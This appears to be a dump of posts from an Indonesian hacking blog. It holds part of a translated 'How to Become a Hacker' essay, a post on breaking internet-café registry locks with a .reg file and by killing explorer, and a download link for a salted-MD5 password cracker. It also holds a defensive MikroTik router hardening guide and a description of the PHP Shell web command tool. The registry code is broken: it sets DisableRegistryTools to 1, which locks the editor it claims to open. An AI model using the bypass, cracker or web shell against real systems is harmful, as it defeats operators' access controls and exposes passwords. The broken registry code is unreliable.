C, Lisp, dan Perl) ketimbang sistem operasi Microsoft yang anda impikan, anda memperoleh kesenangan, dan anda mendapatkan lebih banyak ilmu ketimbang anda merealisasikan yang telah anda pelajari hingga anda menoleh kebelakang sebagai seorang master hacker.Untuk mempelajari Unix, lihat The Loginataka.Untuk mempelajari Linux, lihat Where To Get Linux.3. Belajar Cara Menggunakan World Wide Web dan Menulis HTMLBanyak hal dari budaya hacker yang membangun pekerjaan mereka diluar dari hal ini, membantu menjalankan pabrik, perkantoran dan universitas tanpa berpengaruh langsung pada kehidupan orang-orang awam. Web adalah satu pengecualian terbesar, mainan hacker yang berkilauan ini diakui telah mengubah dunia ketimbang politik. Untuk alasan tunggal inilah, anda harus belajar cara bekerja dengan Web.Hal ini tidak berarti mempelajari cara menggunakan browser (siapapun dapat melakukan hal itu), namun mempelajari cara menulis HTML, bahasanya Web. Jika anda tidak mengetahui cara memprogram, menulis HTML yang membantu anda belajar. Bangunlah sebuah website.Namun hanya memiliki sebuah website tidak lantas menjadikan anda cukup baik untuk menjadi hacker.
Web merupakan himpunan home page. Anda memerlukan petunjuk tentang dunia HTML, lihat The HTML Hell Page).Agar berguna, halaman anda harus memiliki isi (content) – harus menarik dan/atau bermanfaat bagi hacker lainnya.Status Budaya HackerSeperti kebanyakan budaya tanpa kemandirian ekonomi, hackerdom memiliki reputasi. Anda mencoba memecahkan masalah yang menarik, namun betapa menariknya mereka, dan apakah solusi anda benar-benar baik, adalah suatu hal yang memerlukan kemampuan teknis atau kepakaran yang diperlukan untuk menilai.Berdasarkan hal itu, saat anda melakukan permainan hacker, anda belajar menjaga skor utama anda melalui apa yang hacker lain pikirkan tentang keahlian anda (inilah mengapa anda tidak benar-benar menjadi seorang hacker hingga hacker lainnya secara konsisten menyebut anda sebagai hacker). Kenyataannya adalah image yang tidak jelas tentang hacking seperti pekerjaan mereka yang terkungkung; juga dengan larangan budaya hacker (sekarang berangsur-angsur memudar tapi masih berpotensi) terhadap pengakuan bahwa ego atau pengakuan dunia luar merupakan salah satu dari motivasi seseorang.Khususnya, hackerdom adalah apa yang para ahli antropologi sebagai budaya terikat. Anda mendapatkan status dan reputasi didalamnya dengan tidak dengan mendominasi orang lain, tidak mengandalkan kecantikan, tidak memiliki sesuatu yang orang lain inginkan, namun memberikan sesuatu yang lebih berharga.
Khususnya, memberikan waktu anda, kreatifitas anda, dan hasil dari kemampuan anda.Ada 5 hal mendasar yang bisa anda lakukan untuk dihormati oleh para hacker:1. Menulis Software Gratis Anda.Hal pertama (pada umumnya) adalah menulis program yang hacker lain anggap sangat menyenangkan dan bermanfaat, dan memberikan sumber program ke dunia hacker untuk digunakan.Hackerdom seperti kelompok manusia setengah dewa yang menulis sebagian besar, program hebat yang kita temui diseluruh dunia dan banyak digunakan oleh setiap orang.2. Membantu Menguji dan Mendebug Software Gratis.Mereka juga melayani orang-orang yang membuat dan mendebug software gratis. Dalam dunia yang tidak sempurna ini, kita tidak dapat menghindari sebagian besar waktu yang dihabiskan dalam pengembangan software adalah saat mendebug. Itulah mengapa penulis software gratis orang-orang berpikir untuk memberitahukan anda bahwa penguji beta yang baik (siapapun yang mengetahui cara menggambarkan gejalanya, dan bersedia menerapkan beberapa contoh rutin diagnosanya) merupakan hadiah paling berharga bagi mereka.
Bahkan orang ini bisa membuat perbedaan antara fase mendebug yang memakan waktu lama, mimpi buruk yang menakutkan dan orang itu mau bersusah-payah demi sesuatu yang berguna.Jika anda seorang newbie, cobalah mencari sebuah program yang masih dikembangkan, bahwa anda tertarik dengannya dan menjadi seorang penguji beta yang baik. Itulah sifat alami untuk membantu menguji program membantu mendebug-nya guna membantu mereka memodifikasi. Banyak hal yang dapat anda pelajari dalam hal ini, dan memberikan anda karma yang baik pada orang-orang yang anda bantu di kemudian hari.3. Publikasikan informasi yang berguna.Hal baik lainnya adalah mengumpulkan dan menyaring informasi yang berguna dan menarik pada halaman web atau dokumentasi seperti FAQ (Frequently Asked Question) dan tersedia untuk umum.Pemelihara sebagaian besar FAQ teknis juga mendapatkan kehormatan yang sama dengan penulis software gratis.4. Membantu menjaga kerja infrastruktur.
Budaya hacker (dan pengembangan mesin Internet dijalankan oleh para sukarelawan. Ada banyak kebutuhan namun kerja yang tidak glamour senantiasa dikerjakan – mengadministrasi mailing list, memoderasi newsgroup, memelihara situs arsip software yang besar, mengembangkan RFC dan standar teknis lainnya.Orang-orang yang melakukan hal ini layak mendapatkan kehormatan, karena setiap orang mengetahui pekerjaan ini memakan banyak waktu dan tenaga serta tidak banyak kesenangan yang didapat sebagaimana bermain-main dengan kode. Mereka telah menunjukkan dedikasinya.5. Melayani budaya hacker itu sendiri.Akhirnya, anda bisa melayani dan menyebarluaskan budaya itu sendiri (misalkan tentang cara terbaik untuk menjadi seorang hacker :-)).Ini bukanlah sesuatu yang harus anda lakukan telah anda menjadi terkenal dan melakukan 4 hal diatas.Budaya hacker tidak memiliki pemimpin, tepatnya, namun mereka memiliki pahlawan dan adat-istiadat turun menurun dan bahasa. Saat anda melakukan perjalanan yang cukup panjang, mungkin anda tumbuh disini. Waspadalah: para hacker tidak mempercayai egoisme dalam budaya mereka, jadi sejauh mata memandang, egoisme dikenal sangat berbahaya. Ketimbang berupaya untuk hal itu, anda harus menyadari urutan posisi anda sendiri dan menjadi teladan dan bersikap ramah mengenai status anda.
The Hacker/Nerd ConnectionBerlawanan dengan mitos terkenal, anda tidak harus menjadi seorang nerd untuk menjadi seorang hacker. Hal itu memang membantu, bagaimanapun juga, dan sebagian hacker adalah nerd yang sebenarnya. Menjadi seorang terkucil dari masyarakat membantu anda tetap terkonsentrasi pada hal yang benar-benar penting, seperti berpikir dan hacking.Untuk alasan inilah, sebagian hacker mengadopsi label ‘nerd’ dan bahkan menggunakan istilah lebih keras, yakni ‘geek’ sebagai badge kebanggaan mereka – inilah suatu cara menyatakan independensi mereka dari anggapan masyarakat awam. Lihat The Geek Page untuk pembahasan lebih lanjut.Jika anda bisa mengatur konsentrasi yang layak pada hacking untuk menjadi lebih baik dan masih memiliki kehidupan, itu sangat baik. Sekarang lebih mudah daripada saat saya masih menjadi seorang newbie; adat budayanya jauh lebih bersahabat terhadap techno-nerd. Ada beberapa orang yang menyatakan bahwa para hacker merupakan calon pacar/suami/istri yang berkualitas tinggi. Untuk informasi lebih jauh tentang hal ini silakan lihat Girl's Guide to Geek Guys.Jika anda tertarik pada hacking karena anda tidak memiliki penghidupan, tidak masalah juga – setidaknya anda tidak memiliki kesulitan dalam konsentrasi.
Mungkin anda akan mendapatkan jodoh, suatu hari nanti.Titik GayaSekali lagi, untuk menjadi seorang hacker, anda harus memiliki pola pikir seorang hacker. ada beberapa hal yang bisa anda lakukan saat anda tidak berada di depan komputer untuk membantu orang lain. Hal ini mungkin saja tidak berhubungan dengan hacking namun sebagian hacker melakukannya, dan merasa bahwa mereka memiliki ketertarikan di bidang yang sama.
Bacalah buku fiksi sains. Pergilah ke pertemuan fiksi sains (cara terbaik untuk berjumpa dengan hacker dan proto-hacker).
Study Zen, dan/atau mengambil seni beladiri. (disiplin jiwa sangatlah penting.)
Mengembangkan kemampuan bermain musik. Belajar mengapresiasikan jenis musik khusus. Belajar memainkan beberapa instrumen musik dengan baik, atau cara menyanyi.
Mengembangkan apresiasi anda dengan mengikuti kuis berhadiah.
Belajar menulis dalam bahasa asing dengan baik. (sejumlah hacker juga adalah seorang penulis buku.)Ada banyak hal yang harus anda lakukan, terutama adalah bahwa anda memiliki kapasitas sebagai seorang hacker. Mampu menggunakan kecakapan otak sebelah kiri dan kanannya adalah sangat penting (para hacker harus mampu berpikir secara logis dan bertindak tidak logis guna memecahkan masalah suatu waktu.)Akhirnya, beberapa hal yang tidak boleh dilakukan.
Jangan bertindak bodoh, membesar-besarkan user ID atau screen name.
Jangan mengobarkan kebencian di Usenet (atau ditempat lainnya)
Jangan menggelari diri anda sendiri sebagai ‘cyberpunk’, dan jangan membuang-buang waktu anda pada setiap orang.
Jangan memposting atau menulis email yang dipenuhi kesalahan eja dan tata bahasa yang buruk.Jangan menjadikan diri anda atau orang lain sebagai bahan ejekan. Para hacker memiliki ingatan yang panjang – yang mengakibatkan anda perlu waktu bertahun-tahun agar anda bisa diterima.Narasumber lainnyaTerjemahan dokumen ini tersedia dalam bahasa Prancis, Spanyol dan Jepang.Loginataka memiliki beberapa hal untuk disampaikan mengenai pelatihan dan sikap yang layak dari seorang Unix Hacker.Saya juga telah menulis mengenai A Brief History Of HackerdomPeter Seeback memelihara suatu Hacker FAQ yang luar biasa ini bagi para manager yang tidak memahami cara bergaul dengan hacker.Saya telah menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan seluk beluk budaya Linux. Anda dapat menemukannya di halaman ini.Frequently Asked Questions (Pertanyaan yang seringkali diajukan)Q: Bersediakan anda mengajari saya cara melakukan Hack?Semenjak awal publikasi halaman ini, saya banyak mendapat permintaan dari orang mengenai “ajari saya semua tentang hacking”. Sayangnya, saya tidak memiliki waktu atau energi untuk melakukan hal ini; proyek hacking saya sendiri memerlukan 110% dari waktu saya.Bahkan bila saya melakukannya, hacking adalah suatu sikap dan keahlian yang pada dasarnya harus anda miliki untuk mengajarkan diri anda sendiri.
Anda akan menjumpai bahwa saat seorang hacker sejati ingin membantu anda, mereka tidak akan menghormati anda jika anda meminta dengan menghiba-hiba segala sesuatu yang mereka ketahui.Pelajari beberapa hal untuk pertama kalinya. Tunjukkan bahwa anda telah mencoba, bahwa anda mampu belajar sendiri. Kemudian jumpailah seorang hacker dengan pertanyaan tersebut.Q: Dimana saya dapat berdialog dengan seorang hacker sejati?Baiklah, yang jelas bukan melalui IRC, saya yakin –- disana tidak ada satupun selain flamer dan cracker, sejauh yang saya ketahui. Cara terbaik adalah mencari suatu kelompok pengguna Linux atau Unix setempat untuk anda dan melakukan dialog dengan mereka (ada direktori halaman kelompok pengguna Linux di Sunsite).Q: Bahasa apa yang harus saya pelajari untuk pertama kali?HTML, jika anda tidak mengetahuinya. Ada banyak sumber, hype-HTML, buku panduan HMTL diluar sana, dan sebagainya. Salah satu yang terbaik adalah HTML: The Definitive Guide.Saat anda mulai melakukan pemrograman, saya sarankan memulainya dengan Perl atau Phython. C juga sangat penting, namun juga lebih sulit.Q: Bagaimana saya memulainya? Dimana saya bisa mendapatkan free UNIX?Disuatu tempat dihalaman ini saya sertakan petunjuk dimana mendapatkan Linux. Untuk menjadi seorang hacker anda perlu dorongan dan inisiatif dan kemampuan untuk mendidik diri anda sendiri. Mulailah sekarang…


Sumber : Wanchee100


ReadMore

Sabtu, 20 Februari 2010

Mengacak-acak Registry Warnet

Yang merasa udah jadi Hacker gak usah di baca,,,,,,,

Sering gak waktu pergi ke warnet, lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas fin yang ada di warnet di comot, mau gunain dos eh di matiin trus Runnya di culik,,, ih... kesel gak ma warnet kayak gini, saya siih kesel banget, tapi untung aja yang jaga warnet sedikit cakep,,, hehehehehe...... tau sendirilah....

Tpi kadang-kadang stiap pergi ke warnet kayak gini kesel juga, user bener-bener semua di kunci dan salah satu kunci untuk membuka itu adalah REGISTRY. Lalu bagaimana jika ternyata Registry warnet di kunci, ckakakaka,,, untuk itu lah saya membuka wawasan anda melalui artikel ini. tidak perlu menjadi seorang expert untuk menjebol registry ini, di luar pakem engak juga tuh,,,


Memang sih ada tool yang bisa digunain untuk mendukung aksi kita ini, tetapi hampir di setiap warnet atau setiap komputer pasti ada kok, cuman sebuah program text editor sederhana seperti Notped, Wordpad, kalau mau Microsoft Word juga bisa,, giman udah gak sabarkan mengacak-acak warnet dengan 4 langkah mudah... ITS SHOW TIME!!!!

Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text editor kalian :


------------------------[ cut here the code ]-----------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001


; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]


; proses selesai
------------------------[ cut here the code ]-----------------------


Langkah kedua save kode dengan ekstensi REG, misalnya dengan nama mylove.reg atau terserah anda deh namanya pokoknya berekstensi REG

Langkah ketiga cukup klik hasil file yang anda simpan tadi. Kemudian lanjutkan dengan langkah keempat.

langkah terakhir reboot komputer anda, tpi jangan gunakan telunjuk sakti anda. Cukup dengan menggunakan kombinasi Ctrl+Alt+Del. Diharapkan anda tidak jantungan ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask kan lagi.

Sekarang klik start lalu run dan ketikkan regidit. Zup........ regedit yang manis terbuka dan lakukan apa yang anda lakukan.... Saran ja, rubah ja RegisterOwner dan Organitation dengan nama anda, bukan apa apa... biasa ingin terkenal,,, hehehehe....


Met mencoba,,,,


Sumber : ebook-paktani.tk (JASAKOM)

ReadMore

Senin, 15 Februari 2010

PasswordsPro

Md5 sehari-hari kita gunakan untuk mengenskrip data sebelum kita simpan ke dalam database. Namun kenyataannya md5 ini memiliki kelemahan. Enskripsi satu arah yang diciptakan tahun 1991 ini sebenarnya sejak tahun 1996 sudah dianjurkan untuk tidak digunakan lagi.


tool untuk nge-crack MD5 yang ada salt nya,,,


Download :

http://rapidshare.com/files/161284732/PasswordsPro.v2.4.4.1-DOA.rar

untuk keterangan cara penggunaannya bisa diliat disini :


http://www.youtube.com/watch?v=8N-fXuVfuyE

semoga bermanfaat...

ReadMore

Jumat, 12 Februari 2010

Securing New RouterOs Router (MIKROTIK)

Dokumen ini dirancang untuk perangkat RouterOs tapi yang tidak mempunyai konfigurasi, konfigurasi yang dijelaskan dalam tutorial ini dapat bekerja untuk router sudah dikonfigurasi tetapi harus hati-hati semoga yang diambil konfigurasi ini tidak mempengaruhi perangkat.
Harap membaca dan memahami seluruh dokumen sebelum mendaftar ke perangkat ini, kegagalan untuk melakukan hal ini dapat menyebabkan Anda tidak dapat mengakses perangkat.

Maksud dari dokumen ini untuk mengambil langkah-langkah yang diperlukan untuk mengamankan akses ke perangkat RouterOs sambil mempertahankan kemampuan untuk perangkat lain untuk berkomunikasi dan menggunakan layanan tertentu.


Tidak ada alasan lain bahwa hanya akses router dari BGP pada perangkat untuk memiliki akses penuh dan juga pengguna yang masuk ke dalam memantau sambungan nirkabel harus mempunyai akses tulis atau kemampuan untuk reboot / shutdown etc etc Dengan ini dalam pikiran Anda harus melihat area lain pada jaringan Anda dan bagaimana mereka asses setup / dikonfigurasi - mereka mungkin memerlukan perhatian untuk sepenuhnya aman jaringan anda secara keseluruhan.

The user's going to pick dancing pigs over security every time. — Bruce Schneier

1. Configuring Packages & Hardening Services

Selalu gunakan installasi minimal :

* Advanced-Tools
* Ntp
* Security
* System

Ini adalah paket untuk menginstal sistem dasar di mana Anda dapat menyimpan jam dalam sinkro dengan sumber eksternal, sebuah suite alat canggih yang memungkinkan pemantauan, pelaporan dan memungkinkan Anda untuk berbicara dengan router aman.

Anda harus berpikir tentang peranan yang tepat akan memiliki router sebelum anda mulai mengaktifkan lagi paket pada router, "it's a simple" nirkabel pemancar maka mengapa perlu diaktifkan DHCP atau tidak? Jika router adalah menjadi Ethernet berbasis firewall maka mengapa tidak perlu nirkabel diaktifkan. Hanya memungkinkan paket router perlu untuk melakukan pekerjaannya, jadi yang kita fikirkan adalah keadaan cukup aman pada router kita.

Secara default router bisa diakses mengguanakan :

* Telnet
* SSH
* HTTP
* Winbox
* FTP
* Mac-Telnet

Untuk itu maka gunakanlah 1 cara dengan cara menonaktifkan semuanya dan gunakan salah satu cara saja untuk masuk ke sebuah router, itu adalah cara yang aman.

/ip services print
maka akan memunculkan
Flags: X - disabled, I - invalid # NAME PORT ADDRESS CERTIFICATE
0 telnet 23 0.0.0.0/0
1 ftp 21 0.0.0.0/0
2 www 80 0.0.0.0/0
3 ssh 22 0.0.0.0/0
4 X www-ssl 443 0.0.0.0/0
none


untuk menonaktifkan gunakan perintah

/ip service disable


Anda telah mengkonfigurasi layanan yang Anda sukai sekarang saatnya untuk melihat cara lain untuk antarmuka dengan router, pertama adalah atas SNMP yang digunakan oleh banyak program untuk memonitor perangkat (Ie The Dude). SNMP dimatikan secara default dan jika anda memiliki cara lain monitoring perangkat ini aman untuk meninggalkan dinonaktifkan. Saya lebih suka menggunakan The Dude untuk memonitor jaringan, jadi saya akan pergi ke depan dan memungkinkan akses dan membantu mengatur beberapa bidang.

/snmp set enabled=yes location=”The Matrix” contact=neo@zion.org

SNMP di RouterOs 2,9 adalah membaca saja, sehingga hanya bahaya yang memungkinkan akses ke sana adalah bahwa tanpa firewall untuk menghentikan akses ada pada jaringan atau jika router memiliki alamat IP publik akan dapat melihat sinyal nirkabel, tingkat jaringan, dll.

Sekarang bahwa Anda memiliki dasar keamanan router keamanan dan sekarang adalah waktu untuk melihat pengguna yang mengakses router dan bahwa mereka memiliki hak istimewa atau tidak.

2. Users & Passwords

Secara default mikrotik akan mempunyai user akses adalah admin
maka gunakanlah kebijakan di kantor anda untuk mengetahui user mana yang harus memiliki privilage :

/user set admin password=putpasshere

Gunakalah hanya satu jalur masuk, contohnya gunakan winbox, dan matikan semua layanan yang berjalan diatas, ini berguna untuk melindungi diri dari attacker yang menggunakan ssh brute force, maupun telnet, dan ftp begitu juga menggunakan browser untuk masuk ke router anda. yang berikutnya adalah gunakan 1 komputer di jaringan lokal anda yang hanya bisa masuk router. ini mencegah dari banyak client yang ingin menggunakan router anda dari client menggunakan winbox, jadi meskipun client menginstall winbox dan mengetahui user dan password admin maka tidak akan bisa diijinkan masuk karena hanya IP anda yang bisa anda gunakan untuk masuk.

/user add name=badmin password=putpasshere group=full address=192.168.12.3/32


Setelah itu gunakan winbox untuk menyimpan user dan password anda.



3. Port Knocking

Di firewall kita akan meload ke router nanti kita bahas dibagi menjadi 2 bagian :
1. daftar alamat device yang bisa diakses router.
2. semua device yang lain punya batas waktu untuk akses ke router.

Satu hal bahwa semua perangkat lain yang hanya terbatas bagi mereka yang tidak memiliki Winbox / SSH / telnet akses ke router, yang kadang-kadang berarti Anda tidak bisa memasukinya. Salah satu cara untuk sementara membolehkan akses penuh ke router adalah port ketukan.port knocking RouterOs adalah salah satu cara untuk menambahkan alamat IP dinamis ke dalam daftar alamat untuk jumlah waktu yang ditentukan. Cara kerjanya adalah seperti ini.

  1. client mengirim paket ke router dengan port 1337
  2. router menambah ip client ke address list "temp" misalkan dengan waktu 15 menit.
  3. client mengirim paket ke router degnen port 7331
  4. router mengecek untuk melihat apakah IP client ada di address list "temp".
  5. jika demikian maka router menambah IP address ke address list "safe" dengan waktu 15 menit.
  6. client akan mengakses router selama 15 menit.

Jadi dengan ini client dibatasi waktu aksesnya ke router. ini membuat router lebih aman.
bagi yang belum punya softwarenya silahkan didownload di http://www.zeroflux.org

/proj/knock/files/knock-cygwin.zip

Knock.exe port:protocol port:protocol port:protocol…

Knock.exe 192.168.0.2 1337:tcp 7331:tcp

Meskipun fitur ini berguna namun dalam keamanan, dalam aturan firewall saya akan menunjukkan aturan yang digunakan untuk membuat sebuah port knocking, jika Anda keluar dari aturan ini maka tidak ada port knocking di router anda.
name>
4. Loading A Firewall

Yups sekarang saatnya kita membahas tentang firewall, sekarang router Anda sudah aman dari akses oleh password, tetapi password merupakan salah satu lapisan keamanan - bukan hanya lapisan. Script ini berdasarkan firewall digunakan pada router MT demo tetapi memiliki beberapa perubahan disana, hanya melindungi router dan tidak 'foward' dalam aturan firewall.

/ ip firewall filter
add chain=input protocol=tcp dst-port=1337 action=add-src-to-address-list address-list=knock \ address-list-timeout=15s comment="" disabled=no
add chain=input protocol=tcp dst-port=7331 src-address-list=knock action= add-src-to-address-list \ address-list=safe address-list-timeout=15m comment="" disabled=no


Pada peraturan setup port knocking, setup diatas digunakan pada contoh kami akan gunakan untuk menambahkan alamat IP agar 'aman'-daftar alamat ini adalah alamat yang digunakan dalam daftar ini firewall untuk mengizinkan penuh akses ke router.

add chain=input connection-state=established action=accept comment="accept established connection packets" disabled=no
add chain=input connection-state=related action=accept comment="accept related connection packets" disabled=no
add chain=input connection-state=invalid action=drop comment="drop invalid packets" disabled=no

Aturan ini hanya berlaku pastikan sambungan pergi ke router dan akan mematikan apapun yang tidak sah.

add chain=input src-address-list=safe action=accept comment="Allow access to router from known network" disabled=no


Aturan ini merupakan aturan yang memungkinkan akses penuh ke router untuk alamat IP tertentu, ini berisi daftar IP statis untuk masukan dari Anda akan selalu memiliki akses dan juga berisi IP dinamis dari orang-orang ditambah port knocking jika digunakan.

add chain=input protocol=tcp psd=21,3s,3,1 action=drop comment="detect and drop port scan connections" disabled=no
add chain=input protocol=tcp connection-limit=3,32 src-address-list=black_list action=tarpit \ comment="suppress DoS attack" disabled=no
add chain=input protocol=tcp connection-limit=10,32 action= add-src-to-address-list \ address-list=black_list address-list-timeout=1d comment="detect DoS attack" disabled=no

Ini adalah aturan dari sedikit reaktif ke DoS dan yang mencoba untuk menggunakan port scanner, port scan adalah menurun tetapi serangan DoS adalah 'tarpitted' dalam bahwa semua koneksi yang diperlambat bawah untuk meningkatkan penggunaan sumber daya pada perangkat penyerang.

>
add chain=input protocol=icmp action=jump jump-target=ICMP comment="jump to chain ICMP" disabled=no
add chain=input action=jump jump-target=services comment="jump to chain services" disabled=no

2 peraturan ini beralih ke rantai kita akan membuat, jumping adalah berguna karena memungkinkan Anda untuk kembali aturan yang sama di berbagai rantai (Ie Input dan Forward dapat beralih ke rantai yang sama dan menjalankan peraturan yang sama)

add chain=input dst-address-type=broadcast action=accept comment="Allow Broadcast Traffic" disabled=no
Broadcast membolehkan lalu lintas ke router, hal ini kadang-kadang diperlukan oleh hal-hal seperti NTP

add chain=input action=log log-prefix="Filter:" comment="" disabled=no
add chain=input action=drop comment="drop everything else" disabled=no
Dan ini merupakan aturan yang menolak semua akses ke router, lalu lintas jika belum diterima oleh aturan-aturan di atas maka akan drop.

add chain=ICMP protocol=icmp icmp-options=0:0-255 limit=5,5 action=accept comment="0:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=3:3 limit=5,5 action=accept comment="3:3 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=3:4 limit=5,5 action=accept comment="3:4 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=8:0-255 limit=5,5 action=accept comment="8:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp icmp-options=11:0-255 limit=5,5 action=accept comment="11:0 and limit for 5pac/s" disabled=no
add chain=ICMP protocol=icmp action=drop comment="Drop everything else" disabled=no

Aturan-aturan ini membentuk 'ICMP' rantai yang kami melompat dari prediksi, ia terbatas berbagai paket ICMP untuk menghentikan orang-orang yang ping flooding oleh attacker.

add chain=services src-address-list=127.0.0.1 dst-address=127.0.0.1 action=accept comment="accept localhost" disabled=no
add chain=services protocol=udp dst-port=20561 action=accept comment="allow MACwinbox " disabled=no
add chain=services protocol=tcp dst-port=2000 action=accept comment="Bandwidth server" disabled=no
add chain=services protocol=udp dst-port=5678 action=accept comment=" MT Discovery Protocol" disabled=no
add chain=services protocol=tcp dst-port=161 action=accept comment="allow SNMP" disabled=yes
add chain=services protocol=tcp dst-port=179 action=accept comment="Allow BGP" disabled=yes
add chain=services protocol=udp dst-port=5000-5100 action=accept comment="allow BGP" disabled=yes
add chain=services protocol=udp dst-port=123 action=accept comment="Allow NTP" disabled=yes
add chain=services protocol=tcp dst-port=1723 action=accept comment="Allow PPTP" disabled=yes
add chain=services protocol=gre action=accept comment="allow PPTP and EoIP" disabled=yes
add chain=services protocol=tcp dst-port=53 action=accept comment="allow DNS request" disabled=yes
add chain=services protocol=udp dst-port=53 action=accept comment="Allow DNS request" disabled=yes
add chain=services protocol=udp dst-port=1900 action=accept comment="UPnP" disabled=yes
add chain=services protocol=tcp dst-port=2828 action=accept comment="UPnP" disabled=yes
add chain=services protocol=udp dst-port=67-68 action=accept comment="allow DHCP" disabled=yes
add chain=services protocol=tcp dst-port=8080 action=accept comment="allow Web Proxy" disabled=yes
add chain=services protocol=ipencap action=accept comment="allow IPIP" disabled=yes
add chain=services protocol=tcp dst-port=443 action=accept comment="allow https for Hotspot" disabled=yes
add chain=services protocol=tcp dst-port=1080 action=accept comment="allow Socks for Hotspot" disabled=yes
add chain=services protocol=udp dst-port=500 action=accept comment="allow IPSec connections" disabled=yes
add chain=services protocol=ipsec-esp action=accept comment="allow IPSec" disabled=yes
add chain=services protocol=ipsec-ah action=accept comment="allow IPSec" disabled=yes
add chain=services protocol=udp dst-port=520-521 action=accept comment="allow RIP" disabled=yes
add chain=services protocol=ospf action=accept comment="allow OSPF" disabled=yes
add chain=services action=return comment="" disabled=no


Ini adalah layanan yang kami Izinkan setiap mengakses, karena Anda dapat melihat kebanyakan mereka dinonaktifkan secara default. Satu-satunya adalah layanan yang memungkinkan pribadi saya merasa harus selalu dapat diakses.

* Mac-Telnet
* Bandwidth Test Server
* MT Discovery

Semua layanan lainnya hanya boleh diaktifkan bila mereka merasa diperlukan, menjalankan script ini pada produksi router yang sudah dikonfigurasi akan menyebabkan ia terjatuh ke IPSec, BGP, dan EOIP a bunch dari layanan lainnya, jadi harus diperiksa aturan2 tersebut, jangan asal copy paste. Sekali lagi baca dengan teliti, dan seksama untuk menerapkan aturan ini.

5. Logging & Syslog

Nah penyimpanan yang melebihi 100 baris akan hilang di router. maka log sangat diperlukan untuk memantau semua jaringan.
berikut ini setting default log.

/system logging print
Flags: X - disabled, I - invalid
# TOPICS ACTION PREFIX
0 info memory
1 error memory
2 warning memory
3 critical echo

jadi yang terlihat adalah ketika terjadi booting ulang maka kita akan kehilangan semua log kita.
oleh sebab itu kita harus menanamnya di hardisk.

/system logging print
/system logging remove 0
/system logging remove 1
/system logging remove 2
/system logging remove 3


sekarang kita setup log beberapa ke disk.

/system logging add topics=critical action=disk
/system logging add topics=critical action=echo
/system logging add topics=error action=disk
/system logging add topics=warning action=disk
/system logging add topics=info action=memory


sekarang tinggal mau diset berapa, klo saya 300 baris log untuk memori tapi klo hardisk saya kasih 1000 baris log.

/system logging action print
/system logging action set 0 disk-lines=XXX
/system logging action set 1 disk-lines=XXX


atau sekarang bisa juga kita buat aturan bahwa log tidak di memori namun langsung tersimpan di hardisk, caranya adalah seperti dibawah ini :

/system logging action add target=disk disk-lines=XXX name=FirewallHits


Kemudian kita mengubah logging tindakan untuk menghentikan firewall clogging up log

/system logging print
/system logging set 0 topics=info,!firewall


Dan sekarang kita atur agar semua firewall hits mendapatkan dikirim ke sasaran baru.

/system logging add topics=firewall action=FirewallHits


sekarang tinggal ditentukan alamat IP mana file ini akan disimpan :

/system logging action print
/system logging action set 3 remote=192.168.0.3:514


Jangan lupa untuk menambahkan ': 514' di bagian akhir alamat IP seperti ini menentukan port yang digunakan. Setelah kami telah mengatur IP kita dapat maju dan menambahkan sebuah aturan untuk masuk ke semua daemon

/system logging add action=remote topics=info,warning,critical,firewall,error prefix="RouterId"


setelah itu periksalah tiap hari log tersebut, jangan hanya akan menjadi file sampah ya...

Under *nix-like OS kamu dapat melakukan (FreeBSD):

1. vi /etc/rc.conf

syslogd_enable="YES" # Run syslog daemon (or NO). syslogd_program="/usr/sbin/syslogd" # path to syslogd, if you want a different o syslogd_flags="" # Flags to syslogd (if enabled).
(By default into "syslogd_flags" set "-s" option. Don't forget remove it. The "-a" options are ignored if the "-s" option is also specified. See man syslogd. )


2. vi /etc/syslog.conf

+@ # syslog settings of current system +* # + *.* /var/log/mikrotik.log +*


3. /etc/rc.d/syslogd restart

6. NTP Sync & Misc.

Waktu itu harus disetting jangan lupa.. jangan2 belum diset time di compynya..

/system clock set time-zone=+12

kita juga harus mensetup NTP Client

/system ntp client set enabled=yes primary-ntp=192.168.0.2 secondary-ntp=192.168.0.3 mode=unicast


Sumber : JatimCrew
ReadMore

PHP Shell

PHP Shell adalah sebuah shell dibungkus dalam naskah PHP. Ini adalah alat yang dapat Kita gunakan untuk mengeksekusi shell-perintah sewenang-wenang atau browse filesystem di server web. Ini menggantikan, untuk gelar, koneksi telnet yang normal, dan untuk tingkat yang lebih rendah sebuah koneksi SSH.

Kita menggunakannya untuk administrasi dan pemeliharaan website Kita, yang sering jauh lebih mudah dilakukan jika Kita dapat bekerja secara langsung pada server. Sebagai contoh, Kita dapat menggunakan PHP Shell untuk membongkar dan memindahkan file-file besar. Semua program baris perintah normal seperti id, free, du, df, dll ... dapat digunakan.



Getting Help

Silakan gunakan fasilitas SourceForge untuk memperoleh bantuan pada PHP Shell. Kita bisa mengirimkan laporan bug, bergabung dengan mailing list.

Inherent Limitations

Ada beberapa keterbatasan pada jenis program yang dapat berjalan. Tidak akan ada gunanya jika Kita memulai program grafis seperti Firefox atau bahkan berbasis konsol seperti vi. Semua program harus secara ketat program baris perintah, dan mereka tidak akan memiliki kesempatan untuk mendapatkan input pengguna setelah mereka telah diluncurkan.

Mereka mungkin juga harus mengakhiri dalam waktu 30 detik, karena ini adalah batas waktu standar yang dikenakan kepada semua skrip PHP, untuk mencegah mereka berjalan di loop tak terbatas. ISP Kita mungkin telah menetapkan batas waktu ini untuk sesuatu yang lain.

Tetapi Kita dapat mengandalkan semua kerang-fungsi normal, seperti pipa, output dan input redirection, dll ... (Tidak ada -selesai, meskipun :-)

Safe Mode


Safe Mode adalah nemisis PHP Shell. Jika PHP berjalan di Safe Mode maka PHP Shell biasanya tidak akan bekerja - menyesal. Silakan baca detail explaination dalam file KEAMANAN disertakan dalam distribusi PHP Shell.

Installation

